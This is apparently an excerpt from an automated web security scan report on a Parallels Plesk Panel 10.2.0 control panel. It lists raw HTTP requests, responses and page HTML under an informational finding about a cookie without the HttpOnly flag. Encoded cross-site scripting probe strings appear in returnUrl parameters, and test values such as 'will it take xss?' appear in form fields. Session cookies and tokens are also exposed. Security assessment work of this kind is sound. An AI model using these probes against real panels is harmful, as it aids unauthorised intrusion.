Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PLESKSESSID=66f4f3aa52eb21d7134fc0175f742f5a; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 19:19:01 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 19:19:01 GMT
Connection: close
Content-Length: 16874

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="dc1721730e046f7e1de14c19e4a424be" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />


<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/general.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/layout.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/custom.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/desktop.css?2">
<!--[if IE]><link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/ie.css?2"><![endif]-->







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<link href="/skins/default/css/customer/plesk.css?1269638970" media="screen" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<script type="text/javascript" src="/javascript/tooltip.js?1302230642"></script>
<script type="text/javascript" src="/javascript/widget.js?1302230642"></script>
<script type="text/javascript" src="/javascript/chk.js.php?1302230642"></script>
<script type="text/javascript" src="/javascript/common.js?1302230642"></script>
<script type="text/javascript" src="/admin/scripts/admin-panel.js?"></script>
<title>Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/redirect/action-name/pleskin" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fredirect%2Fpleskin%2Froot%2F%252Fplesk%252Fclient%2540%252Fdomain%25401%252Fbackup%252F%2Froot%2F%252Fplesk%252Fclient%2540%252Fdomain%25401%252Fdbbackup%252F%2F%3Fdst%3D%252Fplesk%252Fclient%25402%252Fdomain%25401%252Fbackup%252Flocal-repository%252F%26src%3D%252Fsmb%252Fweb%252Fview%26srcController%3DWebControllerf080b%25253c%25252fScRiPt%252520%25253e664f20b0d02' + '&activeModule=' + '' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading ">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
<a class="s-btn sb-uplevel" href="/smb#">
<span>Up Level</span>
</a>
</div>
<h2><span>Links to Additional Services</span></h2>
</div>
</div>


<div id="content-body" class="clearfix">
<div id="main">

<script type="text/javascript">
var opt_no_frames = true;
Jsw.baseUrl = '/smb';

SetHelpModule = function(module)
{
PleskHelpModule = module;
}
var PleskHelpModule = null;

Jsw.onReady(function() {

$$('.top-help').each(function(topHelp) {
topHelp.select('a').each(function(help) {
help.href = help.href + '/plesk-context/custom_buttons_client/';
if (PleskHelpModule) {
help.href = help.href + '/plesk-module/' + PleskHelpModule + '/';
}
});
});

$$('.sb-uplevel').each(function(link) {
link.href = '/plesk/hosting-panel=account.index/';
});

if ('') {
$('content').down('.heading').addClassName('');
}
});

var opt_integrated_mode = false;

</script>

<script type="text/javascript">
Event.observe(window, 'load', function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: []
});
});
</script>

<div class="screenBody" id="">
<div id="warnings"></div>


<form action="/plesk/client@2/custom-buttons/" method="post" enctype="multipart/form-data" >
   <input type="text" name="iesingletextinputworkaround" disabled style="display: none">
<input type="hidden" name="forgery_protection_token" value="dc1721730e046f7e1de14c19e4a424be">
   <input type="hidden" name="cmd" value="update">
   <input type="hidden" name="lock" value="false">
   <input type="hidden" name="previous_page" value="">
   <input type="hidden" name="wizaction">

   <div class="toolsArea">

<fieldset>

<legend>Tools</legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>

<div class="screenButtons">
<DIV class="commonButton" id="bid-custom-button-new" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Add a link to an online service and place it in the Panel.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/custom-buttons/custom-button@new/properties/&#039;); return false;" style=""><BUTTON name="bname_custom_button_new" id="buttonid-custom-button-new" type="button" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/custom-buttons/custom-button@new/properties/&#039;); return false;">Add Link to Service</BUTTON><SPAN id="spanid-custom-button-new">Add Link to Service</SPAN></DIV>
</div>

</td></tr></table></fieldset>

</div>


<div class="listArea">

<fieldset>

<legend>Links to additional services</legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>


           <script>
           function a(event) { tooltip.set(event, [{"type":"string","string":"The link is visible to users."}]); }
           function b(event) { tooltip.set(event, [{"type":"string","string":"The link is not visible to users."}]); }
           function c(event, place) {
               switch (place) {
               case "navigation":
                   tooltip.set(event, [{"type":"string","string":"The link is located on all pages."}]);
                   break;
               case "admin":
                   tooltip.set(event, [{"type":"string","string":"The link is located on the administrator's home page."}]);
                   break;
               case "reseller":
                   tooltip.set(event, [{"type":"string","string":"The link is located on the reseller's home page"}]);
                   break;
               case "client":
                   tooltip.set(event, [{"type":"string","string":"The link is located on the customer's home page."}]);
                   break;
               case "domain":
                   tooltip.set(event, [{"type":"string","string":"The link is located on the Websites & Domains page of the Subscription."}]);
                   break;
               }
           }
           function z() { tooltip.hide(); }
           </script>
       <div class="paging pagingTop noList">No Links to Additional Services</div><div class="paging pagingBottom noList"></div><script>SetCookie("custombuttonslist", "YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9");
           function CustomButtonsListSetPaging(page)
           {
               var f = document.forms[0];
               f.page.value = page;
               f.cmd.value = "setPage";
               lsubmit(f);
               return false;
           }

           function CustomButtonsListSetPageSize(page_size)
           {
               var f = document.forms[0];
               f.page_size.value = page_size;
               f.cmd.value = "setPageSize";
               lsubmit(f);
               return false;
           }
       
           function CustomButtonsListSelectionGet()
           {
               var f = document.forms[0];
               var selection = new Array();
               for (i = 0 ; i < f.elements.length; i++) {
                   if ((f.elements[i].type == "checkbox") && (f.elements[i].name == "del[]")) {
                       if (!(f.elements[i].value == "DISABLED" || f.elements[i].disabled) && f.elements[i].checked) {
                           selection.push(f.elements[i].value);
                       }
                   }
               }
               return selection;
           }
           function CustomButtonsListSelect()
           {
               f = document.forms[0];
               for (i = 0 ; i < f.elements.length; i++) {
                   if ((f.elements[i].type == "checkbox") && (f.elements[i].name == "del[]")) {
                       if (!(f.elements[i].value == "DISABLED" || f.elements[i].disabled)) {
                           f.elements[i].checked = f.CustomButtonsListSelectAll.checked;
                           CustomButtonsListSelectOnChange(f.elements[i]);
                       }
                   }
               }
               return true;
           }
       
           function CustomButtonsListSelectOnChange(o)
           {
               o = $(o);
               if ("radio" == o.type) {
                   $$("input[name='" + o.name + "']").each(function(el){
                       el.up("tr").removeClassName("selected");
                   });
               }

               if (o.checked)
                   o.up("tr").addClassName("selected");
               else
                   o.up("tr").removeClassName("selected");

               return true;
           }
       
           function CustomButtonsListSort(sort)
           {
               f = document.forms[0];
               f.sort.value = sort;
               f.cmd.value = "setSort";
               lsubmit(f);
               return false;
           }
       
           function CustomButtonsListFilter(f)
           {
               
               if (f.filter.value.length == 0) {
                   CustomButtonsListShowAll(f);
                   return false;
               }
       
               f.cmd.value = "setFilter";
               lsubmit(f);
               return false;
           }
       
           function CustomButtonsListShowAll(f)
           {
               f.cmd.value = "clearFilter";
               lsubmit(f);
               return false;
           }
       
           function CustomButtonsListSearchShow()
           {
               var sc = document.getElementById("CustomButtonsListSearchControl");
               if (sc) {
                   removeClass(sc, "hide");
                   addClass(sc, "show");
               }

               var s = document.getElementById("CustomButtonsListSearch");
               if (s) {
                   removeClass(s, "hide");
                   addClass(s, "show");
               }

               SetPermanentCookie("cListShowSearch", 1);
           }
       
           function CustomButtonsListSearchHide()
           {
               var sc = document.getElementById("CustomButtonsListSearchControl");
               if (sc) {
                   removeClass(sc, "show");
                   addClass(sc, "hide");
               }

               var s = document.getElementById("CustomButtonsListSearch");
               if (s) {
                   removeClass(s, "show");
                   addClass(s, "hide");
               }

               SetPermanentCookie("cListShowSearch", 0);
           }
       
           function CustomButtonsListRemove(f)
           {
               if (0 == CustomButtonsListSelectionGet().length) {
                   alert("No objects selected.");
                   return false;
               }
               f.cmd.value = "remove";
               f.action = "/plesk/client@2/custom-buttons/custom-button@multi/delete/";
               lsubmit(f);
               return false;
           }
       </script>

</td></tr></table></fieldset>

</div>



</form>

</div>
</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

5.10. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/custom-buttons/custom-button@2/properties/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /plesk/client@2/custom-buttons/custom-button@2/properties/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/client@2/custom-buttons/custom-button@2/properties/ HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Proxy-Connection: keep-alive
Referer: http://www.nosedivesailing.com:8880/plesk/client@2/custom-buttons/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: custombuttonslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; PLESKSESSID=66f4f3aa52eb21d7134fc0175f742f5a; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 19:21:01 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 19:21:01 GMT
Connection: close
Content-Length: 17825

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="dc1721730e046f7e1de14c19e4a424be" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />


<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/general.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/layout.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/custom.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/desktop.css?2">
<!--[if IE]><link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/ie.css?2"><![endif]-->







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<link href="/skins/default/css/customer/plesk.css?1269638970" media="screen" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<script type="text/javascript" src="/javascript/tooltip.js?1302230642"></script>
<script type="text/javascript" src="/javascript/widget.js?1302230642"></script>
<script type="text/javascript" src="/javascript/chk.js.php?1302230642"></script>
<script type="text/javascript" src="/javascript/common.js?1302230642"></script>
<script type="text/javascript" src="/admin/scripts/admin-panel.js?"></script>
<title>Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/redirect/action-name/pleskin" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fredirect%2Fpleskin%2Froot%2F%252Fplesk%252Fclient%25402%252F%2F%3Fdst%3D%252Fplesk%252Fclient%25402%252Fcustom-buttons%252F%26src%3D%252Fsmb%252Faccount%26srcController%3DAccountController7bea8%25253c%25252fScRiPt%252520%25253ef9cde00af98' + '&activeModule=' + '' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading ">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
<a class="s-btn sb-uplevel" href="/smb#">
<span>Up Level</span>
</a>
</div>
<h2><span>Settings of a Link to an Additional Service</span></h2>
</div>
</div>


<div id="content-body" class="clearfix">
<div id="main">

<script type="text/javascript">
var opt_no_frames = true;
Jsw.baseUrl = '/smb';

SetHelpModule = function(module)
{
PleskHelpModule = module;
}
var PleskHelpModule = null;

Jsw.onReady(function() {

$$('.top-help').each(function(topHelp) {
topHelp.select('a').each(function(help) {
help.href = help.href + '/plesk-context/custom_button_client_edit/';
if (PleskHelpModule) {
help.href = help.href + '/plesk-module/' + PleskHelpModule + '/';
}
});
});

$$('.sb-uplevel').each(function(link) {
link.href = '/plesk/client@2/custom-buttons/';
});

if ('') {
$('content').down('.heading').addClassName('');
}
});

var opt_integrated_mode = false;

           function update_oC(f)
           {
               f.cmd.value = "update";
               lsubmit(f);
               return false;
           }

           function place_oC(f)
           {
       f.inc_bit_1.disabled = !(("domain" == f.place.value))
f.inc_bit_32.disabled = !(("domain" == f.place.value))
f.inc_bit_512.disabled = !(("domain" == f.place.value))
f.inc_bit_1024.disabled = !(("domain" == f.place.value))
f.inc_bit_2.disabled = !(("domain" == f.place.value) || ("client" == f.place.value) || ("reseller" == f.place.value))
f.inc_bit_4.disabled = !(("domain" == f.place.value) || ("client" == f.place.value) || ("reseller" == f.place.value))
f.inc_bit_8.disabled = !(("domain" == f.place.value) || ("client" == f.place.value) || ("reseller" == f.place.value))
f.inc_bit_16.disabled = !(("domain" == f.place.value) || ("client" == f.place.value) || ("reseller" == f.place.value))

           }
       
</script>

<script type="text/javascript">
Event.observe(window, 'load', function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [{"componentType":"Jsw.Pathbar.Item","title":"Links to additional services","href":"\/plesk\/client@2\/custom-buttons\/"}]
});
});
</script>

<div class="screenBody" id="">
<div id="warnings"></div>


<form action="/plesk/client@2/custom-buttons/custom-button@2/properties/" method="post" enctype="multipart/form-data" >

   <div class="formArea">
       <fieldset>

<legend>Custom button</legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>

<table class="formFields" cellspacing="0" width="100%">

<tr >
   <td class="name"><label for="fid-text">Button label</label>&nbsp;<span class="required">*</span></td>
   <td><input type="text" name="text" id="fid-text" value="inject" size="40" maxlength="254"></td>
</tr>

<tr>
   <td class="name"><label for="fid-place">Location</label></td>
   <td><select name="place" id="fid-place" onChange="place_oC(document.forms[0])">    <option value='navigation'>Common Access</option>
   <option value='domain' SELECTED>Websites &amp; Domains page of Subscription</option>
   <option value='client'>Customer&#039;s Home page</option>
</select>
</td>
</tr>

<tr >
   <td class="name"><label for="fid-sort_key">Priority</label></td>
   <td><input type="text" name="sort_key" id="fid-sort_key" value="100" size="15" maxlength="14"></td>
</tr>

<tr >
   <td class="name"><label for="fid-fname">Background image</label></td>
   <td><input type="file" name="fname" id="fid-fname"></td>
</tr>

<tr >
   <td class="name"><label for="fid-url">URL</label>&nbsp;<span class="required">*</span></td>

   <td><input type="text" name="url" id="fid-url" value="fdf080d92960a97399f5295d" size="40" maxlength="254"></td>

</tr>


<tr>
   <td class="name"><label for="fid-inc_bit_1">Include subscription ID</label></td>
   <td><input type="checkbox" class="checkbox" name="inc_bit_1" id="fid-inc_bit_1" value="true" CHECKED > <label for="fid-inc_bit_1"><span class="hint">&amp;dom_id=&lt;dom_id&gt;</span></label></td>
</tr>

<tr>
   <td class="name"><label for="fid-inc_bit_32">Include Primary Domain name</label></td>
   <td><input type="checkbox" class="checkbox" name="inc_bit_32" id="fid-inc_bit_32" value="true" CHECKED > <label for="fid-inc_bit_32"><span class="hint">&amp;dom_name=&lt;dom_name&gt;</span></label></td>
</tr>

<tr>
   <td class="name"><label for="fid-inc_bit_512">Include FTP username</label></td>
   <td><input type="checkbox" class="checkbox" name="inc_bit_512" id="fid-inc_bit_512" value="true" CHECKED > <label for="fid-inc_bit_512"><span class="hint">&amp;ftp_user=&lt;ftp_user&gt;</span></label></td>
</tr>

<tr>
   <td class="name"><label for="fid-inc_bit_1024">Include FTP password</label></td>
   <td><input type="checkbox" class="checkbox" name="inc_bit_1024" id="fid-inc_bit_1024" value="true" CHECKED > <label for="fid-inc_bit_1024"><span class="hint">&amp;ftp_pass=&lt;ftp_pass&gt;</span></label></td>
</tr>

<tr>
   <td class="name"><label for="fid-inc_bit_2">Include customer ID</label></td>
   <td><input type="checkbox" class="checkbox" name="inc_bit_2" id="fid-inc_bit_2" value="true" CHECKED > <label for="fid-inc_bit_2"><span class="hint">&amp;cl_id=&lt;cl_id&gt;</span></label></td>
</tr>

<tr>
   <td class="name"><label for="fid-inc_bit_4">Include customer's company name</label></td>
   <td><input type="checkbox" class="checkbox" name="inc_bit_4" id="fid-inc_bit_4" value="true" CHECKED > <label for="fid-inc_bit_4"><span class="hint">&amp;cname=&lt;cname&gt;</span></label></td>
</tr>

<tr>
   <td class="name"><label for="fid-inc_bit_8">Include customer's contact name</label></td>
   <td><input type="checkbox" class="checkbox" name="inc_bit_8" id="fid-inc_bit_8" value="true" CHECKED > <label for="fid-inc_bit_8"><span class="hint">&amp;pname=&lt;pname&gt;</span></label></td>
</tr>

<tr>
   <td class="name"><label for="fid-inc_bit_16">Include customer's e-mail</label></td>
   <td><input type="checkbox" class="checkbox" name="inc_bit_16" id="fid-inc_bit_16" value="true" CHECKED > <label for="fid-inc_bit_16"><span class="hint">&amp;email=&lt;email&gt;</span></label></td>
</tr>


<tr >
   <td class="name"><label for="fid-conhelp">Tooltip text</label>&nbsp;</td>
   <td><textarea name="conhelp" id="fid-conhelp" rows="11" style="font-size:10px; width:128px;" cols="50" rows="10">will it take xss?</TEXTAREA></td>
</tr>

<tr>
   <td class="name"><label for="fid-internal">Open URL in Parallels Panel</label></td>
   <td><input type="checkbox" class="checkbox" name="internal" id="fid-internal" value="true" ></td>
</tr>

<tr>
   <td class="name"><label for="fid-private">Show to me only</label></td>
   <td><input type="checkbox" class="checkbox" name="private" id="fid-private" value="true" CHECKED ></td>
</tr>

</table>

<input type="hidden" name="cb_id" value="2">

</td></tr></table></fieldset>
   </div>

   <div class="formArea">
       <table width="100%" class="buttons" cellspacing="0" cellpadding="0"><tr>
           <td class="main" width="0"></td>
           <td class="footnote" id="footnote"><span class="required">*</span> Required fields</td>
           <td class="misc" width="0"><nobr><DIV class="commonButton" id="bid-ok" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Apply all changes.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);return update_oC(document.forms[0]);;return false;" style=""><BUTTON name="bname_ok" id="buttonid-ok" type="submit" onClick="Event.stop(event);return update_oC(document.forms[0]);;return false;">OK</BUTTON><SPAN id="spanid-ok">OK</SPAN><INPUT type="image" style="border: 0pt none ; height: 0pt; width: 0pt; position: absolute; left: -9999px;" src="/skins/default/plesk/images/1x1.gif"></DIV><DIV class="commonButton" id="bid-cancel" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Discard any changes and return to the previous page.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/custom-buttons/&#039;); return false;" style=""><BUTTON name="bname_cancel" id="buttonid-cancel" type="button" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/custom-buttons/&#039;); return false;">Cancel</BUTTON><SPAN id="spanid-cancel">Cancel</SPAN></DIV></nobr></td>
       </tr></table>

<input type="hidden" name="forgery_protection_token" value="dc1721730e046f7e1de14c19e4a424be">
       <input type="hidden" name="cmd" value="update">
       <input type="hidden" name="lock" value="false">
       <input type="hidden" name="previous_page" value="">
       <input type="hidden" name="wizaction">

   </div>

</form>

</div>
</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
